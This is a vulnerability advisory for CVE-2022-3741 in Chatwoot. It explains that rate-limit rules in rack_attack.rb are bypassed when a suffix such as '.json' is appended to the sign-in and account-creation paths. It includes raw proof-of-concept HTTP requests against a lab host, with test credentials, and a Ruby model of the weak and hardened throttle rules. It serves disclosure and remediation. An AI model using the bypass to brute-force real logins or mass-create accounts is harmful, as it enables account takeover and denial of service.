Headline
CVE-2022-3741: Chatwoot's Misconfigured Rack_Attack.rb Does Not Appropriately Protect Against Brute Force Attacks in chatwoot
Description
Chatwoot relies on the rack_attack.rb file to defend the application against various brute force attacks. The Chatwoot application fails to prevent brute force attacks against the listed paths when strings are appended to the end of the POST directory names, because the throttle rules only match the exact path. Some protection still exists, primarily a rule that triggers where more than 300 requests are made in a minute, which appears to be a default rule for the application and configuration. Provided an attacker keeps attacks within 300 per minute, it is possible to bypass the configured rules.
The vulnerability was discovered in all tested directories, including:
– /auth/sign_in.json
– /api/v1/accounts.json
– /super_admin/sign_in.json
As I cannot configure the environment to test the other parameters, I am unsure if they are vulnerable; however, the directories do accept random strings appended to the end. NOTE - Any arbitrary add-on to the end of the directory can bypass the restrictions.
Note that I have tested a possible fix for the issue locally by modifying existing rack_attack rules.
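The following is an added illustration of the misconfiguration class described above; it is not Chatwoot's rack_attack.rb and not the reporter's fix. It models Rack::Attack-style throttles in plain Ruby (no rack-attack gem), with a catch-all "300 requests a minute" rule and a per-IP sign-in rule. The exact-path comparison in the weak rule, the 5-per-5-minutes login limit, the prefix-based hardened rule and the sample IP are assumptions chosen for the demonstration.

```ruby
# Added illustration, not Chatwoot's rack_attack.rb: a pure-Ruby model of
# Rack::Attack-style throttles showing why an exact-path discriminator is
# skipped for a suffixed path such as "/auth/sign_in.json", and how a
# prefix match keeps counting those requests. Rule shapes, limits and the
# IP address are assumptions for the demo.

# Minimal stand-in for a Rack request; only what a throttle block needs.
Req = Struct.new(:http_method, :path, :ip) do
  def post?
    http_method == 'POST'
  end
end

# One throttle rule: the discriminator returns a key (here the client IP)
# when the rule applies, or nil when it does not; keys are counted per
# fixed time window of +period+ seconds.
class Throttle
  def initialize(name, limit:, period:, &discriminator)
    @name, @limit, @period, @disc = name, limit, period, discriminator
    @counts = Hash.new(0)
  end

  # Returns true when this request exceeds the limit in its window.
  def throttled?(req, now)
    key = @disc.call(req)
    return false if key.nil?                # rule does not apply: never counted
    bucket = [@name, key, (now / @period).floor]
    @counts[bucket] += 1
    @counts[bucket] > @limit
  end
end

# Catch-all rule standing in for the "300 requests a minute" fallback.
GLOBAL_RULE = ->(req) { req.ip }

# Weak sign-in rule (assumed shape of the misconfiguration): exact compare.
# "/auth/sign_in.json" != "/auth/sign_in", so such requests are never counted.
WEAK_SIGN_IN = ->(req) { req.ip if req.post? && req.path == '/auth/sign_in' }

# Hardened sign-in rule: match on the route prefix, so a format extension,
# trailing slash or any other appended characters are still counted.
HARDENED_SIGN_IN = lambda do |req|
  req.ip if req.post? && req.path.start_with?('/auth/sign_in')
end

def build_rules(sign_in_rule)
  [
    Throttle.new('req/ip', limit: 300, period: 60, &GLOBAL_RULE),
    Throttle.new('login/ip', limit: 5, period: 300, &sign_in_rule)
  ]
end

# Send +attempts+ POSTs to +path+ from one IP in a single burst (time 0) and
# return how many get through, i.e. how many password guesses the rules allow.
def allowed_attempts(sign_in_rule, path, attempts)
  rules = build_rules(sign_in_rule)
  client = Req.new('POST', path, '203.0.113.7')   # constructed sample IP
  (1..attempts).count do
    # Evaluate every rule so each one records the request, as Rack::Attack does.
    rules.map { |r| r.throttled?(client, 0) }.none?
  end
end

if __FILE__ == $PROGRAM_NAME
  [
    [WEAK_SIGN_IN,     '/auth/sign_in'],
    [WEAK_SIGN_IN,     '/auth/sign_in.json'],
    [HARDENED_SIGN_IN, '/auth/sign_in.json'],
    [HARDENED_SIGN_IN, '/auth/sign_inXYZ']
  ].each do |rule, path|
    name = rule.equal?(WEAK_SIGN_IN) ? 'weak    ' : 'hardened'
    puts "#{name} #{path.ljust(22)} allowed: #{allowed_attempts(rule, path, 400)}"
  end
end
```

With the weak rule, a burst of 400 guesses at /auth/sign_in.json gets 300 through (only the catch-all limit applies), while the same burst at /auth/sign_in is stopped after 5; with the prefix rule both paths stop after 5. A prefix match deliberately over-counts (a request to /auth/sign_in_other would also be counted against the login limit), which is the safer failure direction for an authentication throttle; a regex anchored on the route with an optional format extension is a tighter alternative if the over-counting matters.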
Proof of Concept
POST /auth/sign_in.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/app/login
Content-Type: application/json
Content-Length: 74
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=isHDBFZBkWRHKTcjNmQPFlXVrtaswMNx7FNWeWpiULOnK%2FQakqLzHkfvY33zDMNhewz%2FBgh6VeEqUYoj3a6UA1HjD9WcQW3M0m2pM5N9Jmv88sSRp%2BiEA9dOAP9rhF3WHOIzL%2FI1BA0yWrYOMVZs6IpkAPD%2Fm3kz9E27rxzJ9%2B5fESTBmcJ0LEMT1nB8DvVRj8ULgac0RrjJOjEwySniIbg7HMOKNfP5PeF3FoodUKrhFZE%2F3SReiAt7q2FlHKVVzlwjTdjcz1sYcDTkblkVPRAFt1tYvV6oCA%3D%3D--flwWFZDdAvtdfTYe--tihOFN%2Bg9HKViJZPwD27jQ%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899
{"email":"[email protected]","password":"Password123!","sso_auth_token":""}
POST /super_admin/sign_in.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/super_admin/sign_in
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=1eo0NEleyD9vD3SZGSC5fmQ8%2FqjqauSZabHRTb79DXjlOr4U8zLfpx%2BWEarESorlTjxkoyywq1dQuYez%2BflouTKpf1kCnbrgpQUO0Ejxp2WcS4eX1xfvCwTmQ6mC3FplGhEhGxMYFiyUycwvh7%2Ba5gsmDLSlyNmLBQX%2FdzZY4VSgqJOvP2ttep5hMRorsoSsqBW4z8Sf6u5rCRGJxpMxCS2rL%2BgzCNpurXoswGmIVZ5soMtONk9x7wt42fynVbd2v5ukPwmf%2B%2BneGCXv6QUOI2TbXF7wC18NtKNjtEekVAP2kX8ZkyIS%2B%2FadCrtVcFVg6N4ZLwf7OK2VTiXuHynATmNbjQ2XFUhA0nH7b9yweJ8fGRpUfSv0E8Qpl%2F6r1uQCgdsVTx%2BXjtTpi0gVAIV%2F2%2BqDSzxQmD%2BR5AJQ7KZGnpYFNVYA1Nhje6i8zCwYzd9fTCTjd%2Bh2NZ4tvN6kpQ%3D%3D--7VQsNUvJAAZPOI0f--W7uERdZvn2dJqbk%2FLiftLg%3D%3D; user.id=eyJfcmFpbHMiOnsibWVzc2FnZSI6Ik1RPT0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS51c2VyLmlkIn19--d46f4e34d21234bf149d8e35067adec84d9de555; user.expires_at=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqSXdNakl0TURZdE1UQlVNakE2TWprNk1qZ3VORGszV2lJPSIsImV4cCI6bnVsbCwicHVyIjoiY29va2llLnVzZXIuZXhwaXJlc19hdCJ9fQ%3D%3D--d6b05039464d992e99ff7641408f22cb998b6899; cw_d_session_info={%22access-token%22:%225KrfuMPZEbhzLOJ6cgSUdA%22%2C%22cache-control%22:%22max-age=0%2C%20private%2C%20must-revalidate%22%2C%22client%22:%22FyV_LCCm8MdrctlhgnT6Tg%22%2C%22connection%22:%22close%22%2C%22content-length%22:%22595%22%2C%22content-type%22:%22application/json%3B%20charset=utf-8%22%2C%22etag%22:%22W/%5C%227dd1dcb51fcc95eae77b2ec9c6ad96ce%5C%22%22%2C%22expiry%22:%221660161568%22%2C%22referrer-policy%22:%22strict-origin-when-cross-origin%22%2C%22token-type%22:%22Bearer%22%2C%22uid%22:%[email protected]%22%2C%22x-content-type-options%22:%22nosniff%22%2C%22x-download-options%22:%22noopen%22%2C%22x-frame-options%22:%22SAMEORIGIN%22%2C%22x-permitted-cross-domain-policies%22:%22none%22%2C%22x-request-id%22:%22b90b4747-6fea-44e2-a677-ebe87930ab16%22%2C%22x-runtime%22:%220.249821%22%2C%22x-xss-protection%22:%221%3B%20mode=block%22}
Upgrade-Insecure-Requests: 1
authenticity_token=WWh5xWO3jgXwVKZb3zWM94qL52osMpbCpFFeuxRsdlgb%2B7OtMdtb%2F4FjNpY68ZA4Q67TDc0iV6OsDsS5O4d8OQ%3D%3D&super_admin%5Bemail%5D=JOANNE%40mayorsec%2ecom&super_admin%5Bpassword%5D=Password123%21&super_admin%5Bremember_me%5D=0
POST /api/v1/accounts.json HTTP/1.1
Host: 192.168.1.3:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.3:3000/app/auth/signup
Content-Type: application/json
Content-Length: 144
Origin: http://192.168.1.3:3000
DNT: 1
Connection: close
Cookie: _chatwoot_session=pOArRsb8vDx6%2FpQuywQLE3E0lznJlbGrnqLLNMT9ySqt7YR4eh%2BSdWTMW6dmES79X13k5aCblM30KNbNhw7mCnpqV26eYv2LrM6XrnIu8KDwl3pubsrWEKxO0iM%2F6uUxdnY3J2Qryff78SF8vn7HPkYvS00yyAQ6JFGAcOlUL38tU7C1LxVmlLPo958m47gmGwgYruLnFPn7Rur9Oz6NMTVlmLe2maTpqv4TFB%2FvKc6kP38fZunPGVeRxPwKasUAE4%2BXyUJkb5Z6MXhrqi8PENPlbkQ1dDkFRQ%3D%3D--Cu1By7B2Un6rncH9--wgscGhl5IJUSIrAiD5e0AQ%3D%3D
{"account_name":"KATHRINE","user_full_name":"KATHRINE","email":"[email protected]","password":"Password123!","h_captcha_client_response":""}
Impact
Impact varies for each individual vulnerability in the application. For generation of accounts, it may be possible, depending on the amount of system resources available, to create a DoS event in the server. These accounts still need to be activated; however, it is possible to identify the output Status Code to separate accounts that are generated and waiting for email verification.
For the sign in directories, it is possible to brute force login attempts to either login portal, which could lead to account compromise.
Occurrences
References
- CWE-307 Improper Restriction of Excessive Authentication Attempts
- OWASP OAT-019 Account Creation
- OWASP Top 10 - A2:2017 Broken Authentication